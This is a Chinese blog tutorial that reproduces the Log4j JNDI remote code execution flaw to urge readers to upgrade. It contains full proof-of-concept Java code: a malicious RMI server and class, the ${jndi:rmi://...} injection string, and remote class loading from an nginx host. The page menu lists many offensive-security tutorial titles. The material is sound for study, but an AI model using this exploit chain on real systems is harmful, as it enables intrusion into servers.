冰河技术
导读
♻学习路线
  • 面试必问系列

    • 面试必问
  • 架构与模式

    • Java极简设计模式
    • 实战高并发设计模式
  • Java核心技术

    • Java8新特性
    • IOC核心技术
    • JVM调优技术
  • 容器化核心技术

    • Dockek核心技术
  • 分布式存储

    • Mycat核心技术
  • 数据库核心技术

    • MySQL基础篇
  • 服务器核心技术

    • Nginx核心技术
  • 渗透核心技术

    • 渗透实战技术
  • 底层技术
  • 源码分析
  • 基础案例
  • 实战案例
  • 面试
  • 系统架构
  • Spring6核心技术
  • 分布式事务

    • 分布式事务系列视频
  • SpringBoot
  • SpringCloudAlibaba
  • 🔥AI大模型项目

    • 一站式AI智能平台
    • AI智能客服系统
    • AI智能问答系统
    • 实战AI大模型
  • 中间件项目

    • 手写高性能Redis组件
    • 手写高性能脱敏组件
    • 手写线程池项目
    • 手写高性能SQL引擎
    • 手写高性能Polaris网关
    • 手写高性能RPC项目
  • 高并发项目

    • 分布式IM即时通讯系统(新)
    • 分布式Seckill秒杀系统
    • 实战高并发设计模式
  • 微服务项目

    • 简易电商脚手架项目
  • 手撕源码

    • 手撕Spring6源码
🌍知识星球
  • 总览

    • 《书籍汇总》
  • 出版图书

    • 《深入理解高并发编程:核心原理与案例实战》
    • 《深入理解高并发编程:JDK核心技术》
    • 《深入高平行開發:深度原理&專案實戰》
    • 《深入理解分布式事务:原理与实战》
    • 《MySQL技术大全:开发、优化与运维实战》
    • 《海量数据处理与大数据技术实战》
  • 电子书籍

    • 《实战高并发设计模式》
    • 《深入理解高并发编程(第2版)》
    • 《深入理解高并发编程(第1版)》
    • 《从零开始手写RPC框架(基础篇)》
    • 《SpringCloud Alibaba实战》
    • 《冰河的渗透实战笔记》
    • 《MySQL核心知识手册》
    • 《Spring IOC核心技术》
  • 关于自己
  • 关于学习
  • 关于职场
B站
Github
导读
♻学习路线
  • 面试必问系列

    • 面试必问
  • 架构与模式

    • Java极简设计模式
    • 实战高并发设计模式
  • Java核心技术

    • Java8新特性
    • IOC核心技术
    • JVM调优技术
  • 容器化核心技术

    • Dockek核心技术
  • 分布式存储

    • Mycat核心技术
  • 数据库核心技术

    • MySQL基础篇
  • 服务器核心技术

    • Nginx核心技术
  • 渗透核心技术

    • 渗透实战技术
  • 底层技术
  • 源码分析
  • 基础案例
  • 实战案例
  • 面试
  • 系统架构
  • Spring6核心技术
  • 分布式事务

    • 分布式事务系列视频
  • SpringBoot
  • SpringCloudAlibaba
  • 🔥AI大模型项目

    • 一站式AI智能平台
    • AI智能客服系统
    • AI智能问答系统
    • 实战AI大模型
  • 中间件项目

    • 手写高性能Redis组件
    • 手写高性能脱敏组件
    • 手写线程池项目
    • 手写高性能SQL引擎
    • 手写高性能Polaris网关
    • 手写高性能RPC项目
  • 高并发项目

    • 分布式IM即时通讯系统(新)
    • 分布式Seckill秒杀系统
    • 实战高并发设计模式
  • 微服务项目

    • 简易电商脚手架项目
  • 手撕源码

    • 手撕Spring6源码
🌍知识星球
  • 总览

    • 《书籍汇总》
  • 出版图书

    • 《深入理解高并发编程:核心原理与案例实战》
    • 《深入理解高并发编程:JDK核心技术》
    • 《深入高平行開發:深度原理&專案實戰》
    • 《深入理解分布式事务:原理与实战》
    • 《MySQL技术大全:开发、优化与运维实战》
    • 《海量数据处理与大数据技术实战》
  • 电子书籍

    • 《实战高并发设计模式》
    • 《深入理解高并发编程(第2版)》
    • 《深入理解高并发编程(第1版)》
    • 《从零开始手写RPC框架(基础篇)》
    • 《SpringCloud Alibaba实战》
    • 《冰河的渗透实战笔记》
    • 《MySQL核心知识手册》
    • 《Spring IOC核心技术》
  • 关于自己
  • 关于学习
  • 关于职场
B站
Github
  • 第01部分:基础环境篇

    • 安装Kali系统
    • Kali配置
    • Kali中各项菜单的功能
    • 安装open-vm-tools实现虚拟机交互
    • Kali设置静态IP
    • kali安装免杀工具Veil-Evasion
    • 在Debian8上安装WPScan
    • metasploitable2修改密码
    • 操作系统支持的管道符
  • 第02部分:渗透工具篇

    • 使用Easy-Creds工具攻击无线网络
    • Nmap+Zenmap+Amap+Zmap
    • Zenmap
    • Amap
    • Zmap
    • Nessus的整理
    • Burpsuite上传截断及截断原理介绍
    • Kali2.0 Meterpreter 运用
    • lcx.exe内网转发命令教程-LCX免杀下载
    • 字典生成工具Crunch的使用案例
    • WinlogonHack获取系统密码
    • Msfvenom生成各类Payload命令
    • PsExec下载地址及其用法
    • Hydra安装Libssh模块
    • 利用procdump+Mimikatz 绕过杀软获取Windows明文密码
    • SQLMap的用法+谷歌黑客语法
    • SQLMap用法总结
    • SQLMap参数说明
    • 十大渗透测试演练系统
    • 目录扫描神器DirBuster用法
    • NMap在实战中的常见用法
    • Metasploit模块的格式说明
    • Meterpreter命令大全
    • Metasploit-Meterpreter-Shell信息收集相关的命令
    • 使用Metasploit编写绕过DEP渗透模块
    • Metasploit渗透php-utility-belt程序
    • 内网IPC$入侵
    • Metasploit渗透BSPlayer V2.68
    • Metasploit攻击VSFTPD2.3.4后门漏洞并渗透内网
    • Metasploit攻击PHP-CGI查询字符串参数漏洞并渗透内网
    • Metasploit攻击HFS2.3上的漏洞
    • Metasploit访问控制的持久化
    • Metasploit清除渗透痕迹
    • 利用Metasploit找出SCADA服务器
    • 利用Metasploit渗透DATAC-RealWin-SCADA Server2.0
    • MSF-Meterpreter清理日志
    • Metasploit自定义FTP扫描模块
    • Metasploit渗透MSSQL
    • Metasploit渗透VOIP
    • 破解工具hydra安装与使用
    • Metasploit自定义SSH认证暴力破解器
    • Metasploit自定义让磁盘失效的后渗透模块
    • PowerShell基本命令和绕过权限执行
    • Metasploit自定义收集登录凭证的后渗透模块
    • 利用Java生成穷举字典(数字+字母(大小写)+字符)
    • PowerShell工具之Powerup详解实录
    • Meterpreter以被控制的计算机为跳板渗透其他服务器
    • Win10完美去除桌面快捷图标小箭头
    • OpenVAS 8.0 Vulnerability Scanning
    • kali Metasploit 连接 Postgresql 默认密码
    • kali 使用OpenVAS进行漏洞扫描
    • kali 对威胁建模(附加搭建CVE:2014-6287漏洞环境)
    • kali Metasploit设置永久访问权限
    • Empire 反弹回 Metasploit
    • Metasploit制作并运行自定义Meterpreper脚本
    • 使用Metasploit实现对缓冲区栈的溢出攻击
    • 使用Metasploit实现基于SEH的缓冲区溢出攻击
    • Metasploit基本后渗透命令
    • Metasploit高级后渗透模块
    • Kali中一键更新Metasploit框架
    • Metasploit其他后渗透模块
    • Metasploit高级扩展功能
    • Metasploit之pushm和popm命令
    • Metasploit使用reload、edit、reload_all命令加快开发过程
    • Metasploit资源脚本的使用方法
    • 在Metasploit中使用AutoRunScript
    • 使用Metasploit获取目标的控制权限
    • 使用Metasploit中的NMap插件扫描并渗透内网主机
    • Kali一句话升级Metasploit的命令
    • Win2012R2打Windows8.1-KB2919355
    • Armitage基本原理
    • Armitage网络扫描以及主机管理
    • 使用Armitage进行渗透
    • 使用Armitage进行后渗透攻击
    • 使用Armitage进行客户端攻击
    • Armitage脚本编写
    • Armitage控制Metasploit
    • Armitage使用Cortana实现后渗透攻击
    • Armitage使用Cortana创建自定义菜单
    • Armitage界面的使用
    • tcpdump用法说明
  • 第03部分:木马篇

    • 各种一句话木马大全
    • asp图片木马的制作和使用
  • 第04部分:SQL注入篇

    • sqli-labs-master 下载与安装
    • SQL注入点检测方法
    • SQL语句生成一句话
    • ASP连接MSSQL数据库语句
    • SQL注入绕过技术总结
    • SQL Server启动/关闭xp_cmdshell
  • 第05部分:漏洞拿Shell篇

    • 各种解析漏洞拿shell
    • 网站入侵思路
    • IIS 6.0/7.0/7.5、Nginx、Apache 等 Web Service 解析漏洞
    • iis7.5加fck解析漏洞后台拿shell
    • 真正的IIS永远的后门解密
  • 第06部分:暴力破解篇

    • 使用rarcrack暴力破解RAR,ZIP,7Z压缩包
    • 使用reaver傻瓜式破解wifi之利用路由器WPS漏洞
    • Python爆破Wifi密码
    • MySQL暴力破解工具多线程版
  • 第07部分:渗透脚本篇

    • 3389脚本开启代码(vbs版)
    • 触发Easy File Sharing Web Server 7.2 HEAD缓冲区溢出的Python脚本
  • 第08部分:数据与系统提权篇

    • 数据库提权
    • NC反弹CMDSHELL提权总结
    • ASP Web提权
    • MSF提权
    • Metasploit Win10提权
  • 第09部分:客户端渗透篇

    • 浏览器渗透
    • 对网站的客户进行渗透
    • 与DNS欺骗的结合使用
    • 基于PDF文件格式的渗透攻击
    • 基于Word文件格式的渗透攻击
    • 使用Metasploit实现对Linux客户端的渗透
    • 使用Metasploit渗透Android系统
  • 第10部分:社会工程学

    • Metasploit之社会工程学工具包
  • 第11部分:log4j重大漏洞

    • 冰河连夜复现了Log4j最新史诗级重大漏洞,含完整案例代码,全网最全!!
  • 第12部分:问题记录篇

    • HTTP 错误 403.1 - 禁止访问:执行访问被拒绝
    • XP IIS 问题总结
    • IIS 403 404问题
    • DEDE5.7初始化数据体验包获取失败/无法下载安装
    • discuz报错Table 'uc.uc_pms' doesn't exist,uc_pms不存在
    • Windows远程登录提示超出允许最大连接数解决方案
    • Windows 2008自动关机最简单的解决方案
    • Hydra安装报错
    • 安装OpenVAS后找不到默认密码无法登录Web端
    • AppScan使用问题记录
    • Kali系统报错
    • Kali运行WPScan报错

冰河连夜复现了Log4j最新史诗级重大漏洞,含完整案例代码,全网最全!!

大家好,我是冰河~~

周末与一些小伙伴交流的过程当中,发现一些小伙伴公司的项目中使用的Log4j版本还是2.14.0,我一听就有点震惊了:你们还在使用Log4j的2.14.0版本,这个版本存在重大漏洞啊!

但是有些小伙伴看起来对Log4j中存在的重大漏洞不以为意。“我们项目中使用的Log4j一直是2.14.0这个版本啊,一直没啥问题啊!”。哎,看来有些小伙伴对Log4j2.14.0版本存在的漏洞还是不太了解呀,于是我连夜录制了复现Log4j最新重大漏洞的视频,发布到了B站。

本文配套视频如下所示,配套代码关注 冰河技术 公号回复 log4j 获取。

本文总览

2022-05-30-017

漏洞背景

相信有不少小伙伴都还记得在2021年12月份发布的Log4j(2.14.1及以下版本)重大漏洞,这个漏洞主要是利用Log4j支持的JNDI技术在服务器上执行任意代码。并且此漏洞的安全威胁巨大。官方给出的评估如下。

  • 公开程度:漏洞细节已公开
  • 利用条件:无权限要求
  • 交互要求:0 click
  • 漏洞危害:高危、远程代码执行
  • 影响范围:Log4j2.x <= 2.14.1

``以上评估来自:https://x.threatbook.cn/v5/article?threatInfoID=10470``

这个漏洞非常非常严重,但是有些小伙伴还在不以为然,今天,我们就一起重现下Log4j的这个重大漏洞。希望各位小伙伴们了解到这个漏洞的严重性后,尽快升级项目中所适用的Log4j版本。

另外,就像我写的《冰河的渗透实战笔记》中描述的那样,骇客和骇客有着本质的区别,本文会模拟骇客利用Log4j漏洞入侵服务器的整个过程。对渗透感兴趣的小伙伴可以在 冰河技术 公号回复 渗透笔记 获取《冰河的渗透实战笔记》电子书。

重现Log4j重大漏洞

为了重现Log4j的重大漏洞,我在IDEA中创建了一个Maven项目log4j-demo,如下所示。

2022-05-30-001

其中log4j-all模块表示本次重现Log4j重大漏洞的所有代码示例。后续为了更好的演示真实的环境效果,我将log4j-all中的代码由拆分成log4j-rmi和log4j-website两个Maven模块。

其中,大家要重点理解的是log4j-rmi模拟的是在一名骇客本地运行的RMI服务,而log4j-website模拟的是一个远程站点,也就是将要被入侵的服务器。在本文中会有详细的场景介绍。

总体项目依赖

打开log4j-demo(Maven父工程)的pom.xml文件,如下所示。

<modules>
    <module>log4j-rmi</module>
    <module>log4j-website</module>
    <module>log4j-all</module>
</modules>

<dependencies>
    <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-api</artifactId>
        <version>2.14.0</version>
    </dependency>

    <dependency>
        <groupId>org.apache.logging.log4j</groupId>
        <artifactId>log4j-core</artifactId>
        <version>2.14.0</version>
    </dependency>

</dependencies>

<build>
    <plugins>
        <plugin>
            <groupId>org.apache.maven.plugins</groupId>
            <artifactId>maven-compiler-plugin</artifactId>
            <version>3.6.1</version>
            <configuration>
                <source>1.8</source>
                <target>1.8</target>
            </configuration>
        </plugin>
    </plugins>
</build>

可以看到,在log4j-demo(Maven父工程)的pom.xml文件中只是依赖了Apache的2.1.40版本的Log4j,并没有其他多余的Maven依赖。

重现log4j-all漏洞

这里,我们首先以log4j-all模块为例,重现Log4j最新重大漏洞。

log4j-all整体说明

log4j-all模块整体的代码情况如下所示。

2022-05-30-003

如上图所示:

  • io.binghe.log4j.rmi包下的RmiObj类和RmiServer类模拟的是运行在骇客本地的RMI服务。
  • io.binghe.log4j包下的Log4jDemo类模拟的是远程站点。
  • log4j2.xml:Log4j的日志配置文件。

Log4j日志配置

首先看下log4j-all模块下resources目录下的log4j2.xml文件,如下所示。

<?xml version="1.0" encoding="UTF-8"?>
<Configuration status="WARN">
    <Appenders>
        <Console name="Console" target="SYSTEM_OUT">
            <PatternLayout pattern="%d{HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n"/>
        </Console>
    </Appenders>
    <Loggers>
        <Root level="info">
            <AppenderRef ref="Console"/>
        </Root>
    </Loggers>
</Configuration>

可以看到,模块下对于Log4j的配置也比较简单,主要就是配置了一个info级别的日志输出,并且是输出到控制台。

模拟远程站点代码解析

(1)查看io.binghe.log4j.Log4jDemo类的代码,如下所示。

/**
 * @author binghe (公众号:冰河技术)
 * @version 1.0.0
 * @description Log4j漏洞示例
 */
public class Log4jDemo {

    private static final Logger LOGGER = LogManager.getLogger();

    public static void main(String[] args){
        try {
            String str = "binghe";
            LOGGER.info("输出的信息是:{}", str);
        }catch (Exception e){}
    }
}

相信不少小伙伴在使用Log4j时,会按照上面的方式打印日志。也就是使用Log4j打印日志的{}占位符,后面再跟上要打印的参数。运行下上面的代码,输出的日志如下所示。

10:45:07.560 [main] INFO  io.binghe.log4j.Log4jDemo - 输出的信息是:binghe

可以看到,正确输出了日志信息输出的信息是:binghe。

(2)修改io.binghe.log4j.Log4jDemo类的代码中的str字符串变量,将其修改成如下所示。

String str = "${java:os}";

这里,我们将str字符串变量的值由原理的binghe修改为${java:os},我们先不管${java:os}是个什么鬼,继续运行io.binghe.log4j.Log4jDemo类,看看输出的日志信息是${java:os},还是别的什么鬼玩意儿,运行后输出的结果信息如下所示。

10:48:18.977 [main] INFO  io.binghe.log4j.Log4jDemo - 输出的信息是:Windows 10 10.0, architecture: amd64-64

看到没,输出的信息不是${java:os},而是我正在重现Log4j重大漏洞的电脑操作系统版本Windows 10 10.0, architecture: amd64-64。

我们继续将str字符串换成几个其他的变量值试试,如下所示。

  • 将str字符串换成${java:runtime},输出的结果信息如下所示。
10:51:51.334 [main] INFO  io.binghe.log4j.Log4jDemo - 输出的信息是:Java(TM) SE Runtime Environment (build 1.8.0_202-b08) from Oracle Corporation

可以看到,输出的结果信息是当前Java的运行时环境Java(TM) SE Runtime Environment (build 1.8.0_202-b08) from Oracle Corporation,并不是${java:runtime}。

  • 将str字符串换成${java:vm},输出的结果信息如下所示。
10:53:20.974 [main] INFO  io.binghe.log4j.Log4jDemo - 输出的信息是:Java HotSpot(TM) 64-Bit Server VM (build 25.202-b08, mixed mode)

可以看到,输出的结果信息是Java HotSpot(TM) 64-Bit Server VM (build 25.202-b08, mixed mode),并不是${java:vm}。

看到这里,可能就会有小伙伴有疑问了,Log4j为哈会打印有关操作系统和Java的相关信息呢?

这其实都是Log4j支持JNDI的结果,有关Log4j支持JNDI的信息,小伙伴们可以参考如下链接,这里我就不再过多的赘述了。

https://logging.apache.org/log4j/2.x/manual/lookups.html

在上面的示例中,我们演示的是Log4j支持的Java Lookup功能。

2022-05-30-002

``上述图片来自:https://logging.apache.org/log4j/2.x/manual/lookups.html``

模拟骇客本地进程代码解析

(1)在io.binghe.log4j.rmi下存在这两个Java类,一个是RmiObj类,一个是RmiServer类,这两个类模拟的是在骇客本地运行的RMI服务。首先,来看下RmiObj的代码,如下所示。

/**
 * @author binghe (公众号:冰河技术)
 * @version 1.0.0
 * @description 模拟log4j的漏洞
 */
public class RmiObj implements ObjectFactory {

    static {
        System.out.println("执行代码");
        //这里可以写任意代码,比如木马程序,病毒程序,死循环,后门程序等等。
    }

    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
        return null;
    }
}

可以看到,RmiObj类的代码比较简单,它实现了javax.naming.spi.ObjectFactory接口,但是并没有实现javax.naming.spi.ObjectFactory接口中的getObjectInstance()方法,在getObjectInstance()方法中直接返回null。

这里,重点是在RmiObj中写了一个静态代码块,如下所示。

static {
    System.out.println("执行代码");
    //这里可以写任意代码,比如木马程序,病毒程序,死循环,后门程序等等。
}

就是这个静态代码块,让骇客利用Log4j的远程代码执行漏洞,可以在远程服务器上做任何想要做的事情。

这里,我们只是在静态代码块中简单的打印了执行代码四个字,如果你的项目被骇客盯上了,或许就没我这么友善了。

(2)接下来,看下io.binghe.log4j.rmi包下的RmiServer类,如下所示。

/**
 * @author binghe (公众号:冰河技术)
 * @version 1.0.0
 * @description 模拟漏洞的RMIServer
 */
public class RmiServer {

    public static void main(String[] args){
        try{
            LocateRegistry.createRegistry(1099);
            Registry registry = LocateRegistry.getRegistry();

            System.out.println("RMI Listener 1099 port");
            Reference reference = new Reference("io.binghe.log4j.rmi.RmiObj", "io.binghe.log4j.rmi.RmiObj", null);

            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
            registry.rebind("test", referenceWrapper);

        }catch (Exception e){
            e.printStackTrace();
        }
    }
}

RmiServer主要模拟的是在骇客本地运行的RMI进程,而且在log4j-all模块中io.binghe.log4j.rmi包下的RmiObj类和RmiServer都是在骇客本地的代码。

RmiServer类中的代码也是比较简单的,就是按照常规模式发了一个RMI服务。需要注意的是,在RmiServer类中使用Reference类加载了RmiObj类的代码,并且将RMI服务发布在1099端口上,路径是/test。

启动重现漏洞程序

(1)运行io.binghe.log4j.rmi.RmiServer类的main()方法骇客本地的RMI服务,启动后输出的日志信息如下所示。

RMI Listener 1099 port

(2)回到模拟远程站点的io.binghe.log4j.Log4jDemo代码,将其中的str字符串变量修改成如下所示。

String str = "${jndi:rmi://192.168.0.106:1099/test}";

其中,jndi:rmi://192.168.0.106:1099/test就是利用Log4j的JNDI技术连接远程RMI服务,其中的192.168.0.106表示我本机的IP地址,1099是启动RMI服务监听的端口号,test是发布RMI服务的根目录。

(3)启动io.binghe.log4j.Log4jDemo类的main()方法,输出了如下的日志信息。

执行代码
11:38:22.380 [main] INFO  io.binghe.log4j.Log4jDemo - 输出的信息是:${jndi:rmi://192.168.0.106:1099/test}

可以看到,在模拟远程站点的Log4jDemo输出的日志中,不仅打印除了Log4j的日志,还打印了在模拟骇客本地RMI服务的io.binghe.log4j.rmi.RmiObj类中的代码。

这意味着什么呢?意味着在远程服务器上执行了骇客本地的程序,而骇客是可以在自己本地的io.binghe.log4j.rmi.RmiObj类的静态代码块中写任意代码的,是不是很恐怖,这确实是Log4j的一个重大漏洞。

漏洞具体场景分析

说到这里,可能有小伙伴不太理解上述代码的执行逻辑。这里,我给大家举一个具体场景的示例。

(1)一名骇客在自己的本地电脑或者自己的服务器上编写了RmiObj类和RmiServer类,并且在RmiObj类的静态代码块中写了很多破坏远程服务器的代码,比如木马程序、病毒程序、后门程序,死循环等等。在本地电脑或者自己的服务器上启动了RmiServer类来启动一个RMI服务,而RmiServer启动时会加载RmiObj类,如下所示。

2022-05-30-004

(2)在远程站点的Web登录页面中的用户名文本框中输入了字符串${jndi:rmi://192.168.0.106:1099/test},当前具体的IP地址和端口号以及RMI服务的根路径根据骇客的具体情况调整。点击登录按钮后模拟登录操作,就会将用户名${jndi:rmi://192.168.0.106:1099/test}和乱写的密码发送到远程站点的后台。

2022-05-30-005

如果远程站点的后台在接收到用户名${jndi:rmi://192.168.0.106:1099/test}和乱写的密码后,在没有做参数校验的情况下,直接利用Log4j按照如下方式,打印传递过来的用户名和密码。

String username = request.getParameter("username");
String password = request.getParameter("password");
logger.info("用户名为:{}, 密码为:{}", username, password);

此时就会触发Log4j的重大漏洞,在远程站点的服务器上执行骇客本地RmiObj类中的static静态代码块中编写的破坏服务器的代码。相信此时远程站点的服务器就会凉凉了。

至此,我们分析完log4j-all模块了。

重现真实场景漏洞

在log4j-all模块中,我们的所有程序都是在同一个代码模块中的,也就是都在同一个项目中,真实的环境是:RMI服务运行在骇客的本地电脑或者自己的服务器上,而远程站点会运行在远程服务器上。接下来,我们就开始模拟一个更加贴合真实环境的场景。

模拟真实场景项目说明

为了模拟真实场景,这里,我将log4j-all模块继续拆分成log4j-rmi模块和log4j-website模块,其中,log4j-rmi模块模拟运行在骇客本地或自己服务器上的RMI服务,而log4j-website模块模拟远程站点。

2022-05-30-007

log4j-website模块代码分析

在log-website模块中的代码比较简单,整体上在resources目录下有一个log4j2.xml文件,内容与log4j-all模块的log4j2.xml文件内容相同。在log-website模块的io.binghe.log4j包中存在一个Log4jDemo类,代码也与log4j-all模块中的Log4jDemo类的代码基本相同(有稍许不同)。这里,为了模拟远程站点一般部署在远程服务器上,这里将模拟远程站点的Log4jDemo类单独拆分成一个Maven模块工程。log4j-website模块代码结构如下所示。

2022-05-30-008

注意:在log-website模块中的Log4jDemo类的main()方法中会新增如下两行代码。

System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");

好了,这就是在log-website模块下模拟的远程站点的Log4jDemo类。

log4j-rmi模块代码分析

我们将log4j-all模块中模拟骇客本地RMI服务的RmiObj类和RmiServer类拆分到了log4j-rmi模块。log4j-rmi模块代码结构如下所示。

2022-05-30-009

其中,RmiObj类与log4j-all中的RmiObj类相同。而RmiServer类比log4j-all模块中的RmiServer类有稍许不同。我们来看下在log4j-rmi模块中的RmiServer类,如下所示。

/**
 * @author binghe (公众号:冰河技术)
 * @version 1.0.0
 * @description 模拟漏洞的RMIServer
 */
public class RmiServer {

    public static void main(String[] args){
        try{
            LocateRegistry.createRegistry(1099);
            Registry registry = LocateRegistry.getRegistry();

            System.out.println("RMI Listener 1099 port");
            Reference reference = new Reference("RmiObj", "RmiObj", null);

            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
            registry.rebind("test", referenceWrapper);

        }catch (Exception e){
            e.printStackTrace();
        }
    }
}

可以看到在log4j-rmi模块中的RmiServer类中,创建Reference对象时传递的参数与在log4j-all的RmiServer类中创建Reference对象时传递的参数不同。在RmiServer类中创建Reference对象时传递的参数是RmiObj的全类名,而这里传递的是简单类名。细心的读者应该已经发现了,我在log4j-rmi模块中将RmiObj类和RmiServer类都移动到了java目录下,并没有创建Java包。

第一次运行程序模拟真实场景

(1)启动log4j-rmi模块下的RmiServer类,会打印出如下日志信息。

RMI Listener 1099 port

说明RMI服务启动成功,并监听了1099端口。

(2)运行log4j-website模块下的Log4jDemo类,输出的日志信息如下所示。

12:44:23.021 [main] INFO  io.binghe.log4j.Log4jDemo - 输出的信息是:Reference Class Name: RmiObj

可以看到,在log4j-website模块下的Log4jDemo类中并没有打印出log4j-rmi模块下的RmiObj类中static静态代码块中输出的信息。

也就是说,远程站点不会执行骇客本地的代码,真实环境不存在这个漏洞?答案是非也,真实环境也存在远程代码执行漏洞。

改造log4j-rmi模块代码

(1)到链接http://nginx.org/en/download.html下载一个Nginx,这里我下载的是Windows版本的Nginx,版本号是1.22.0,如下所示。

2022-05-30-010

(2)将下载后的Nginx进行解压,这里,我将Nginx解压到我本地电脑的D盘下的Nginx/nginx-1.22.0目录下,如下所示。

2022-05-30-011

(3)使用Maven编译log4j-demo整体功能,找到编译后的log4j-rmi模块下的target/classes目录下的RmiObj.class文件,如下所示。

2022-05-30-012

(4)将编译后的log4j-rmi模块下的target/classes目录下的RmiObj.class文件复制到Nginx的html目录下,如下所示。

2022-05-30-013

复制后的效果如下所示。

2022-05-30-014

(5)双击Nginx目录下nginx.exe文件启动Nginx,如下所示。

2022-05-30-015

(6)修改log4j-rmi模块下的RmiServer类的代码,将创建Reference对象时,调用Reference类的构造方法的第三个参数修改成http://127.0.0.1:80/,如下所示。

Reference reference = new Reference("RmiObj", "RmiObj", "http://127.0.0.1:80/");

上述代码表示创建Reference类时,加载了Nginx下的RmiObj.class文件中的RmiObj类。

至此,log4j-rmi模块的代码就改造完成了。

第二次运行程序模拟真实场景

(1)启动log4j-rmi模块下的RmiServer类,会打印出如下日志信息。

RMI Listener 1099 port

说明RMI服务启动成功,并监听了1099端口。

(2)运行log4j-website模块下的Log4jDemo类,输出的日志信息如下所示。

执行代码
13:04:22.542 [main] INFO  io.binghe.log4j.Log4jDemo - 输出的信息是:${jndi:rmi://192.168.0.106:1099/test}

可以看到,这次在log4j-website模块下的Log4jDemo程序的命令行打印出了从Nginx中加载的RmiObj类的静态代码块中输出的信息,而Nginx中的RmiObj类其实就是骇客本地的RmiObj类。

至此,我们再次重现了Log4j的重大漏洞。

漏洞真实场景分析

这里真实场景分析中,远程站点服务器的执行流程与重现log4j-all漏洞中漏洞具体场景分析下的远程站点服务器执行流程相同,都是如下图所示。

2022-05-30-006

而骇客本地RMI服务程序的执行流程稍有不同,这里的流程如下图所示。

2022-05-30-016

理解起来也比较简单,这里,我就不再赘述了。

写在最后

这次的Log4j远程代码执行漏洞威胁很大,不仅很多开源软件受其影响,而且还有很多服务器也深受其害。所以,各位小伙伴们如果在项目中使用的Log4j的版本小于等于2.14.1,那就尽快升级到更高版本的Log4j吧,升级Log4j刻不容缓,大家赶紧行动起来。

关于星球

最近,冰河创建了【冰河技术】知识星球,《SpringCloud Alibaba实战》专栏的源码获取方式会放到知识星球中,同时在微信上会创建专门的知识星球群,冰河会在知识星球上和星球群里解答球友的提问。

今天,【冰河技术】知识星球再开放200张优惠券,还没上车的小伙伴赶紧啦,再不上车就跟不上啦!!

星球提供的服务

冰河整理了星球提供的一些服务,如下所示。

加入星球,你将获得:

1.学习SpringCloud Alibaba实战项目—从零开发微服务项目

2.学习高并发、大流量业务场景的解决方案,体验大厂真正的高并发、大流量的业务场景

3.学习进大厂必备技能:性能调优、并发编程、分布式、微服务、框架源码、中间件开发、项目实战

4.提供站点 https://binghe.site 所有学习内容的指导、帮助

5.GitHub:https://github.com/binghe001/BingheGuide - 非常有价值的技术资料仓库,包括冰河所有的博客开放案例代码

6.可以发送你的简历到我的邮箱,提供简历批阅服务

7.提供技术问题、系统架构、学习成长、晋升答辩等各项内容的回答

8.定期的整理和分享出各类专属星球的技术小册、电子书、编程视频、PDF文件

9.定期组织技术直播分享,传道、授业、解惑,指导阶段瓶颈突破技巧

星球门票价格

星球目前的门票价格50元,随着每次加入新实战项目和分享硬核技术上调入场价格。

特别提醒: 苹果用户进圈或续费,请加微信「hacker_binghe」扫二维码,或者去公众号「冰河技术」回复「星球」扫二维码进圈。

最后,小伙伴们可以扫描或者长按下图中的二维码加入星球,也可以在 冰河技术 公众号回复 “ 星球 ” ,领取入场优惠券。

sa-2022-04-21-007

好了,今天就到这儿吧,我是冰河,我们下期见~~

写在最后

如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!

在 GitHub 上编辑此页
上次更新: 2026/4/29 16:18
Contributors: binghe001
阅读全文
×

扫码或搜索:冰河技术
发送:290992
即可立即永久解锁本站全部文章

星球会员
跳转链接